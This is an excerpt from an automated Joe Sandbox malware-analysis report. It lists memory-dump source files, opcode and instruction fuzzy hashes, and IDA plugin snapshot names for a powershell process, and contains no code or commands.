                              • Instruction ID: ce935b8aa89d61343c1986bce48afd765cd6e7f936c4cd44b12676a689ef91cd
                              • Opcode Fuzzy Hash: b7d9e443ed3d5b5cb8bd88c0b87dc3ede8e8ccb2d7f09b815829e5f27b7c419f
                              • Instruction Fuzzy Hash: C6410696E0FBC78BF796D3A808551B859C1DF9A250B5C60BAD50EC73D3DD18D80942C1
                              Memory Dump Source
                              • Source File: 00000004.00000002.1822640803.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ffaac560000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 919257c1a72d8462b38bc63380bfe3a66a02a0c9d1f6a72a7ac7b0bc57a20ff9
                              • Instruction ID: 6902596548608eddc16727330add552e59c70a6badfeccef9aba70f032cd9725
                              • Opcode Fuzzy Hash: 919257c1a72d8462b38bc63380bfe3a66a02a0c9d1f6a72a7ac7b0bc57a20ff9
                              • Instruction Fuzzy Hash: AD11B261A4E646CFF748AB2484697B8B6D6AF56300F4841BEF40EC72D3DD28A8498741
                              Memory Dump Source
                              • Source File: 00000004.00000002.1822640803.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ffaac560000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 59ba8be7ebbb02299bc1d5a2a37985c5ecbec59aa3f7b6525b756142103f1909
                              • Instruction ID: 8b59c0e3eaf63009fc1048f611438f765c25800677d00cd522e33bdefba807bf
                              • Opcode Fuzzy Hash: 59ba8be7ebbb02299bc1d5a2a37985c5ecbec59aa3f7b6525b756142103f1909
                              • Instruction Fuzzy Hash: 3801A77014CB0C8FDB48EF0CE051AA5B7E0FB85324F10052DE58AC3661DB32E881CB41
                              Memory Dump Source
                              • Source File: 00000004.00000002.1822640803.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ffaac560000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0b66803672a79d1ca6b83695b183db2ee58b4b450225e2fc636e4fbc969d464e
                              • Instruction ID: e16f7eb70f6c6e3669f9edef3414d8b097b3a73bf66bc4a68090942102b01eed
                              • Opcode Fuzzy Hash: 0b66803672a79d1ca6b83695b183db2ee58b4b450225e2fc636e4fbc969d464e
                              • Instruction Fuzzy Hash: 26719DA7D4F7C38FFB134B2858A50E67F64EF1366470E40F7E4C98A093E919580A97A1